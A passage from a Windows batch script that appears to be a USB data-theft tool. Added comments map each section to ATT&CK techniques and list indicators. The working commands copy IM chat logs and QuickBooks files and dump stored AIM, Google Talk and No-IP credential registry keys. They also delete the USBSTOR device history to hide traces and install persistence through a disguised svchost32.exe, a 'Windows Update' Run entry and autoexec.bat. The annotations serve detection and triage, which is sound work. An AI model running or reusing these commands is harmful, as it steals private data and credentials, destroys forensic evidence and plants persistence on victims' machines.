- if exist "%APPDATA%\*purple*" mkdir "%chatlog%\Pidgin" && echo Pidgin Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%APPDATA%\MySpace*\IM\Logs\*" mkdir "%chatlog%\MySpace\" && echo MySpace Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%APPDATA%\mIRC\logs\*.*" mkdir "%chatlog%\Mirc\" && echo Mirc found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%APPDATA%\xfire\*" mkdir "%chatlog%\xFire\" && echo xFire Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%PROGRAMFILES%\AIM*" mkdir "%chatlog%\AIM\" && echo AIM found. >> ..\.\Documents\%computername%\%username%.txt
- xcopy "%USERPROFILE%\My Documents\My AIM Logs\*" "%chatlog%\AIM\*" /s /c /q /r /h /y
- xcopy "%APPDATA%\JAMS\*" "%chatlog%\AIM\*" /s /c /q /r /h /y
- xcopy "%APPDATA%\Mirc\logs\*.log" "%chatlog%\Mirc\*" /s /c /q /r /h /y
- xcopy "%APPDATA%\MySpace*\IM\Logs\*" "%chatlog%\MySpace\*" /s /c /q /r /h /y
- xcopy "%APPDATA%\Skype\*" "%chatlog%\Skype\*" /s /c /q /r /h /y
- xcopy "%programfiles%\Trillian\users\default\logs\*.log" "%chatlog%\Trilian\" /s /c /q /r /h /y
- xcopy "%programfiles%\Yahoo!\Messenger\Profiles\*" "%chatlog%\Yahoo!\" /s /c /q /r /h /y
- xcopy "%APPDATA%\Miranda\*" "%chatlog%\Miranda\*" /s /c /q /r /h /y
- xcopy "%APPDATA%\*gaim\*.txt" "%chatlog%\Gaim\" /s /c /q /r /h /y
- xcopy "%APPDATA%\*gaim\*.xml" "%chatlog%\Gaim\" /s /c /q /r /h /y
- xcopy "%USERPROFILE%\My Documents\ICQ Lite\*" "%chatlog%\ICQ\*" /s /c /q /r /h /y
- xcopy "%APPDATA%\.purple\*" "%chatlog%\Pidgin\*" /s /c /q /r /h /y
- xcopy "%APPDATA%\Xfire\chatlog\*.*" "%Chatlog%\xfire\*.*" /s /c /q /r /h /y
- :QB
- rem Accounting-data collection section (ATT&CK T1005). Skipped when QBdis.set exists.
- rem Copies QuickBooks-related file types from My Documents only, without recursing into subfolders.
- rem Unlike the other sections, the destination is built from the drive letter of the running script
- rem rather than from the relative Documents path, so check the root of that drive for a Documents folder.
- rem The QuickBooks folder is created only when a file matching the QB wildcard exists, but the xcopy lines run regardless.
- if exist "..\system\Settings\QBdis.set" goto :noip
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Dump Quick Books Files----- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- if exist "%USERPROFILE%\My Documents\*.QB*" MkDir ..\.\Documents\%computername%\QuickBooks
- xcopy "%USERPROFILE%\My Documents\*.t05" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
- xcopy "%USERPROFILE%\My Documents\*.QDB" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
- xcopy "%USERPROFILE%\My Documents\*.QDT" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
- xcopy "%USERPROFILE%\My Documents\*.QBA" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
- xcopy "%USERPROFILE%\My Documents\*.QBB" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
- xcopy "%USERPROFILE%\My Documents\*.QBM" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
- xcopy "%USERPROFILE%\My Documents\*.QBW" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
- xcopy "%USERPROFILE%\My Documents\*.QBX" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
- xcopy "%USERPROFILE%\My Documents\*.QBY" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
- :noip
- rem No-IP client collection section (ATT&CK T1552.002, T1005). Skipped when noipdis.set exists.
- rem Queries the Vitalwerks DUC registry key and copies the No-IP log files from Program Files.
- rem presumably the DUC key holds the dynamic-DNS client's stored account settings - verify; if so, rotate that account.
- rem Triage note: Import.reg and ReadMe.txt are written to a shared noip folder directly under Documents,
- rem not to the NoIP folder created under the per-host directory, and that shared folder is never created here.
- if exist "..\system\Settings\noipdis.set" goto :aim
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Dump Registry/Logs Entry No-IP----- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- mkdir "..\.\documents\%computername%\NoIP"
- reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC\" >> ..\.\Documents\noip\Import.reg
- xcopy "%ProgramFiles%\No-IP\*.log" "..\.\Documents\%computername%\NoIP\*.log" /c /q /r /h /y
- echo Use Import.reg and import into registry then startup no-ip program >> ..\.\Documents\noip\ReadMe.txt
- :aim
- rem AIM credential section (ATT&CK T1552.002). Skipped when aimdis.set exists.
- rem Dumps the current user's AIM6 Passwords registry key into the log. Read-only on the host.
- rem The author marks this section as untested ("Need Testing.").
- if exist "..\system\Settings\aimdis.set" goto :googletalk
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Dump Registry Entry AIM Encrypted ----- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- reg query "HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords" >> ..\.\Documents\%computername%\%username%.txt
- echo Need Testing. >> ..\.\Documents\%computername%\%username%.txt
- :googletalk
- rem Google Talk credential section (ATT&CK T1552.002). Skipped when googletalkdis.set exists.
- rem Dumps the current user's Google Talk Accounts registry key into the log. Read-only on the host.
- rem The author marks this section as untested ("Need Testing.").
- if exist "..\system\Settings\googletalkdis.set" goto :thumbs
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Dump Registry Entry Google Talk ----- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- reg query "HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts" >> ..\.\Documents\%computername%\%username%.txt
- echo Need Testing. >> ..\.\Documents\%computername%\%username%.txt
- :thumbs
- rem Thumbnail-cache collection, followed by an anti-forensics step. Both parts are gated by thumbsdis.set.
- rem Part 1 (ATT&CK T1005): copies thumbs.db from My Pictures, My Documents and Desktop. The Thumbs folder
- rem is created only when My Documents has a thumbs.db, but all three copy lines run regardless.
- rem Tip.txt is written to a shared thumbs folder directly under Documents, not the per-host folder.
- if exist "..\system\settings\thumbsdis.set" goto :backdoor
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Dump Thumbs.db From MyDoc & Desktop ----- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- if exist "%userprofile%\My Documents\thumbs.db" mkdir ..\.\Documents\%computername%\Thumbs
- copy /Y "%userprofile%\My Documents\My Pictures\thumbs.db" "..\.\Documents\%computername%\Thumbs\MyPictures.db"
- copy /Y "%userprofile%\My Documents\thumbs.db" "..\.\Documents\%computername%\Thumbs\MyDocuments.db"
- copy /Y "%userprofile%\Desktop\thumbs.db" "..\.\Documents\%computername%\Thumbs\Desktop.db"
- echo note: You can view thumb nail size images of files in current dir by using a program >> ..\.\Documents\thumbs\Tip.txt
- rem Part 2 (ATT&CK T1070): has no label of its own and repeats the thumbsdis.set gate.
- rem Issues a reg delete with /va against the USBSTOR enumeration key, i.e. it targets the record of
- rem USB storage devices that incident responders rely on. The confirmation line is printed to the
- rem console only and is not appended to the log.
- rem Detection: reg.exe delete against Enum\USBSTOR; other records of device connection, such as
- rem setupapi logs and event logs, are not touched by this script.
- if exist "..\system\settings\thumbsdis.set" goto :backdoor
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Delete USB plugin list ----- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- reg Delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR\ /va /f
- echo Deleted Recent USB list in registry.
- :backdoor
- rem Persistence section (ATT&CK T1547.001, T1036). Skipped when backdoordis.set exists.
- rem Drops svchost32.exe and drivers.vbs from the script's system folder into the root of C:, and appends
- rem a start line for them to C:\autoexec.bat via a local autoexec.bat. Nothing here is written to the log.
- rem Indicators from this section: C:\svchost32.exe, C:\drivers.vbs, a "start drivers.vbs" line in
- rem C:\autoexec.bat, and a Run entry named "Windows Update". The file name imitates svchost.exe, which
- rem legitimately lives in the System32 folder, never in the root of C:.
- rem NOTE(review): the key path and value syntax on the reg add line look malformed, so the Run-key write
- rem may fail; hunt on the dropped files and autoexec.bat as well as on the Run key.
- if exist "..\system\Settings\backdoordis.set" goto :end
- reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current\VersionRun "Windows Update"="/"C:\Svchost32.exe"" /y
- copy .\system\svchost32.exe C:\svchost32.exe
- copy .\system\drivers.vbs C:\drivers.vbs
- echo start drivers.vbs C:\svchost32.exe >> autoexec.bat
- type autoexec.bat >> C:\autoexec.bat
- :end
- rem Footer: appends a closing timestamp to the per-host log and exits. This is also the kill-switch target.
- rem Together with the date line written by the system-info section, it brackets the run time in a recovered log.
- echo ----------------------------------------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Time:%date% %time%----- >> ..\.\Documents\%computername%\%username%.txt
- echo ----------------------------------------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- exit